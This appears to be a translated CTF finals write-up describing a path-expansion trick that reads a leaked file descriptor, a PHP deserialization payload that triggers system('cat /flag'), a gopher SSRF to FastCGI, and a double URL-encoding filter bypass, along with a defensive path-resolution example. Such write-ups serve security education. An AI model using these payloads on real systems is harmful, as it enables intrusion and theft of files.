
强国杯 (Qiangguo Cup) Finals Writeup

source link: https://guokeya.github.io/post/JSF9GgDPM/

Author: 没队伍一人康康题

c0ol P@th

expanduser turns a leading ~ into the corresponding user's home directory, looked up from /etc/passwd.
So ~sys expands to /dev/.
The flag file happened to have been open()ed and never closed, so a file descriptor is left behind.
Brute-force the fd number: ~sys/fd/6.
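As an added defensive illustration (not code from the writeup), the contrast below shows the root cause in the challenge, a user-controlled path fed to os.path.expanduser, next to a hardened resolver that takes '~' literally and confines every path to an assumed base directory:

```python
import os
import posixpath

# Constructed example, not the challenge's own code. The challenge expanded
# user input with expanduser, so "~sys/..." resolved via /etc/passwd to the
# sys account's home (/dev on Debian-style systems) and "~sys/fd/6" reached a
# file descriptor the application had left open.

BASE_DIR = "/srv/app/files"  # assumed document root for this example


def vulnerable_resolve(user_path: str) -> str:
    """What the challenge effectively did: trust the input and expand '~'."""
    return os.path.expanduser(user_path)


def safe_resolve(user_path: str, base_dir: str = BASE_DIR):
    """Return an absolute path under base_dir, or None if the input is unsafe.

    - never calls expanduser, so '~' and '~user' are taken literally
    - rejects empty input, absolute paths and NUL bytes
    - collapses '..' and checks containment before any filesystem access
    """
    if not user_path or "\x00" in user_path:
        return None
    if user_path.startswith("~") or posixpath.isabs(user_path):
        return None
    candidate = posixpath.normpath(posixpath.join(base_dir, user_path))
    # normpath has already collapsed "..", so anything that climbed out of
    # base_dir no longer starts with base_dir + "/"
    if candidate != base_dir and not candidate.startswith(base_dir + "/"):
        return None
    return candidate
```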

32加32

Hex decode, then base64 decode, then unzip.

<?php

// Challenge gadget class as given (deliberately unsafe: cflag() runs a
// system command when $pass is truthy, so a crafted serialized object is
// enough to trigger it).
class kaka
{

    public $pass = true;
    public $name = '1';
    public $age = '1';


    public function cflag()
    {
        if ($this->pass) {
            eval(system('cat /flag'));
        } else {
            echo "no word, flag";
        }
    }

    // Returns true only when both name and age match exactly.
    public function cname($n, $a)
    {
        if ($this->name === $n) {
            if ($this->age === $a) {
                return true;
            }
        }
        return false;
    }
}

// Generate the serialized payload used in the pop parameter below.
$data = serialize(new kaka());
echo $data;
http://39.107.127.105:50906/?pop=O:4:%22kaka%22:3:{s:4:%22pass%22;b:1;s:4:%22name%22;s:1:%221%22;s:3:%22age%22;s:1:%221%22;}&name=lilei&age=two

ezxunrui

Look for the changelog.

Search the whole codebase for dr_catcher_data.

The parameter is controllable and reaches an SSRF. nginx usually talks to PHP over FastCGI, so use a gopher SSRF.

First run ls | base64 -w0 once and find /readflag,
then read the flag.
http://39.106.156.96:46243/index.php?s=api&c=api&m=qrcode&thumb=gopher payload&text=123&level=1&size=1

https://www.ctfiot.com/59624.html

Java running as root. Unintended solution: two rounds of URL encoding bypass the "flag" keyword filter.
